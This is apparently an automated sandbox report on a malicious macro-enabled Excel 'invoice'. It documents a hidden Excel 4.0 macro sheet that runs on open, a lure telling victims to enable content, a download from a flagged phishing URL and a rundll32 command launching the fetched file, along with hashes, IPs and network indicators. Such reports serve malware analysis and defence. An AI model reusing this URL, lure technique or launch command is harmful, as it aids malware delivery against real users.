Loading ...

Play interactive tourEdit tour

Analysis Report invoice_661434949_67552437.xlsm

Overview

General Information

Sample Name:invoice_661434949_67552437.xlsm
Analysis ID:385000
MD5:64f33ccbc7976306417b2b2528daa5fe
SHA1:d71433580e83ab455556a88c483d1887e9641be6
SHA256:03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2412 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2304 cmdline: rundll32 ..\GVer.iks,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://indianoci.co.uk/ufriends/support.phpAvira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: http://indianoci.co.uk/ufriends/support.phpVirustotal: Detection: 11%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: indianoci.co.uk
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.43.238:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.43.238:80
Source: global trafficHTTP traffic detected: GET /ufriends/support.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: indianoci.co.ukConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28466324.pngJump to behavior
Source: global trafficHTTP traffic detected: GET /ufriends/support.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: indianoci.co.ukConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: indianoci.co.uk
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: support[1].htm.0.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 12 " Once you have enabled edding, please click Ena
Source: Screenshot number: 4Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing. please click Enabl
Source: Document image extraction number: 1Screenshot OCR: Enable Content bytton from the yellow bar above
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellm bar above 12 " Once you have enabled edding, please c|ltfnab|e
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: invoice_661434949_67552437.xlsmInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: invoice_661434949_67552437.xlsmInitial sample: Sheet size: 33810
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{05BDDAB3-C450-4DCC-9410-E7A97B5B20DA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Doc" sheetId="1" r:id="rId1"/><sheet name="Doc1" sheetId="2" r:id="rId2"/><sheet name="Doc2" sheetId="3" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$CL$5</definedName></definedNames><calcPr calcId="0"/></workbook>
Source: rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal80.expl.evad.winXLSM@3/10@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$invoice_661434949_67552437.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBBCF.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\GVer.iks,StartW
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\GVer.iks,StartW
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\GVer.iks,StartWJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: invoice_661434949_67552437.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: invoice_661434949_67552437.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
indianoci.co.uk1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://indianoci.co.uk/ufriends/support.php12%VirustotalBrowse
http://indianoci.co.uk/ufriends/support.php100%Avira URL Cloudphishing
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
indianoci.co.uk
104.21.43.238
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://indianoci.co.uk/ufriends/support.phptrue
  • 12%, Virustotal, Browse
  • Avira URL Cloud: phishing
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2082257180.0000000001D07000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2082025759.0000000001B20000.00000002.00000001.sdmpfalse
              high
              https://www.cloudflare.com/5xx-error-landingsupport[1].htm.0.drfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                104.21.43.238
                indianoci.co.ukUnited States
                13335CLOUDFLARENETUSfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:385000
                Start date:11.04.2021
                Start time:00:10:56
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 4m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:invoice_661434949_67552437.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.expl.evad.winXLSM@3/10@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                104.21.43.238invoice_853027014_428126518.xlsmGet hashmaliciousBrowse
                • indianoci.co.uk/ufriends/support.php
                invoice_853027014_428126518.xlsmGet hashmaliciousBrowse
                • indianoci.co.uk/ufriends/support.php
                invoice_942456281_2051221643.xlsmGet hashmaliciousBrowse
                • indianoci.co.uk/ufriends/support.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                indianoci.co.ukinvoice_2033853593_741382743.xlsmGet hashmaliciousBrowse
                • 172.67.189.4
                invoice_2033853593_741382743.xlsmGet hashmaliciousBrowse
                • 172.67.189.4
                invoice_853027014_428126518.xlsmGet hashmaliciousBrowse
                • 104.21.43.238
                invoice_853027014_428126518.xlsmGet hashmaliciousBrowse
                • 104.21.43.238
                invoice_942456281_2051221643.xlsmGet hashmaliciousBrowse
                • 172.67.189.4
                invoice_942456281_2051221643.xlsmGet hashmaliciousBrowse
                • 104.21.43.238

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                CLOUDFLARENETUSreconocer PO #700-20 D462021,pdf.exeGet hashmaliciousBrowse
                • 172.67.188.154
                shipping document.exeGet hashmaliciousBrowse
                • 162.159.129.233
                Statement-ID-(400603).vbsGet hashmaliciousBrowse
                • 162.159.135.233
                setup-1.exeGet hashmaliciousBrowse
                • 104.21.1.88
                Five.exeGet hashmaliciousBrowse
                • 172.67.130.194
                setup.exeGet hashmaliciousBrowse
                • 1.1.1.1
                SecuriteInfo.com.Trojan.DownLoader38.19635.27871.exeGet hashmaliciousBrowse
                • 104.21.15.11
                SecuriteInfo.com.Trojan.DownloaderNET.151.23895.exeGet hashmaliciousBrowse
                • 172.67.160.253
                Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                • 23.227.38.74
                Purchase Inquiry.xlsxGet hashmaliciousBrowse
                • 172.67.83.132
                jEXf5uQ3DE.exeGet hashmaliciousBrowse
                • 172.67.189.8
                giATspz5dw.exeGet hashmaliciousBrowse
                • 104.21.55.148
                Tmd7W7qwQw.dllGet hashmaliciousBrowse
                • 104.20.185.68
                9R5WtLGEAy.dllGet hashmaliciousBrowse
                • 104.20.185.68
                6BympvyPAv.exeGet hashmaliciousBrowse
                • 172.67.130.194
                #Ud83d#Udcde.htmGet hashmaliciousBrowse
                • 104.16.18.94
                ghnrope2.dllGet hashmaliciousBrowse
                • 104.20.185.68
                mail_6512365134_7863_202104108.htmlGet hashmaliciousBrowse
                • 104.18.10.207
                Copia bancaria de swift.exeGet hashmaliciousBrowse
                • 162.159.135.233
                Production list.exeGet hashmaliciousBrowse
                • 172.67.206.110

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\support[1].htm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text
                Category:downloaded
                Size (bytes):4318
                Entropy (8bit):4.960548542883275
                Encrypted:false
                SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD
                MD5:10E7CF5F758D041A498D76EA11F368BE
                SHA1:3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7
                SHA-256:422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735
                SHA-512:94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF
                Malicious:false
                Reputation:low
                IE Cache URL:http://indianoci.co.uk/ufriends/support.php
                Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28466324.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 756 x 756, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):169558
                Entropy (8bit):7.988183859518103
                Encrypted:false
                SSDEEP:3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs
                MD5:2A06BF86C977F9A29739FD65CE53B5BE
                SHA1:33C88641A06413C919903497577EEA54ED03FAA0
                SHA-256:4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F
                SHA-512:71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR..............4A....sRGB.........pHYs...t...t..f.x....IDATx^....,.U..WWwuu...ir..HBB.$...F".`..E.....k...mI.l.... l.3......$.d@Y.M.....+W}.g.....$#F..`.....C.[o..y...g.Wy....8....#P.<..G..J.....w...=..._+.2h4...AU.u....4/..,..w.U....d..aU.."...V+.2.j..U.._.....Z..]._.....<..A.^.......,+?/.f....H.._..y..:.i..}^S4..Ro+.z#.!.yK.U5.V.7.4.k.V...E.e..!DI\k6.Z.+J.^....j....=x=.+..Qo.y... /2...hfE...(..C..&..q.\.$l..^.F.?..E..>.^..z-HR..H.$l4.Z..U..5..O.(..c.7..4..r.z.v..[.Q..O.>.^......H..h...I4......c..._/..].j.Z....Q..Z..k._.;.....A.Zi.......7.Y...z..]..>pv..N2.IGEm.(.4I..a..m.9. .kU^U....E+h.y. 4.A.g..d.....J..Z.k.E.<_.U.8.......R..P.Wg...._.|^.....z...e...|..FL.>.O.L.zR...h.~PTE..3...IP.y3.../*.......U!_Z."..}>..1s..S#..~.....L?O/...M...W-....*....h..u.J..Wd..$.Ye|k..F..A..h4.,...Q.=N.j.........gUQ........E...q^\."k.L.Z....3j..b.ge. .|&....{iQ$.F..1..4KZa.{.+S.9..F....5..Z. K..y...Y.'A...._.....q.^....EY......1-x.[.
                C:\Users\user\AppData\Local\Temp\72CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):184279
                Entropy (8bit):7.96535016571193
                Encrypted:false
                SSDEEP:3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+
                MD5:A5BF33A3C05F7D7C3CFA963B69299E5A
                SHA1:C60AC1F23B57458BFA14EC2350D5AC6481FAE008
                SHA-256:7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2
                SHA-512:B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0
                Malicious:false
                Reputation:low
                Preview: .U.N.0..#.?D....#4j.b.,.$..p..._.u..{..R.*m#....<..oV.TO.Q{..f.*p.+......Y.I8%.w.5 .....?..`Eh.-.S..9G......V.>Z..o.x.r!:.W../..K.R.2.....\,M..+..q.\.?...T...|..D..C...."Q4.......Z..ri.L.!.P..$k..5y....U..hF08Lt.CC.b.{..'...B^....T[.?....T.".;a.-.2......Es.$Wc........2...3..&.{uxD. ....3$?>$.w#').'|..C.....\..w.L....|~..Bs"....<#....R.E.....u.n.=...*..l.o.|..-.1].A......ax..#%..@D....P9tdw.4L....N.S[.:...[b........PK..........!.........f.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Apr 11 06:11:35 2021, atime=Sun Apr 11 06:11:35 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.474922313871348
                Encrypted:false
                SSDEEP:12:85QNm8LgXg/XAlCPCHaX7B8NB/c46X+Wnicvbw3+bDtZ3YilMMEpxRljK7PTdJP8:85M/XTr6Nt6Yek3SDv3qarNru/
                MD5:02C3D67E8B5892845174D590F43538FD
                SHA1:FC497AEBDD50C17B637780750F85649E615065A1
                SHA-256:2B645F70EA210272EC0B84A998C9C79BA5A3B382375B7E7DC182397967FF1412
                SHA-512:FBB12C573E5B2513FA67123DBE2539CF455E3AC3BAD4EDAC939C9DD91F37A3B292E07A211D8E52345F94283230E9E5A39CD31A5473474B10F1BE057100C68408
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G....B......B..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rr9..Desktop.d......QK.X.Rr9*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\082561\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......082561..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):133
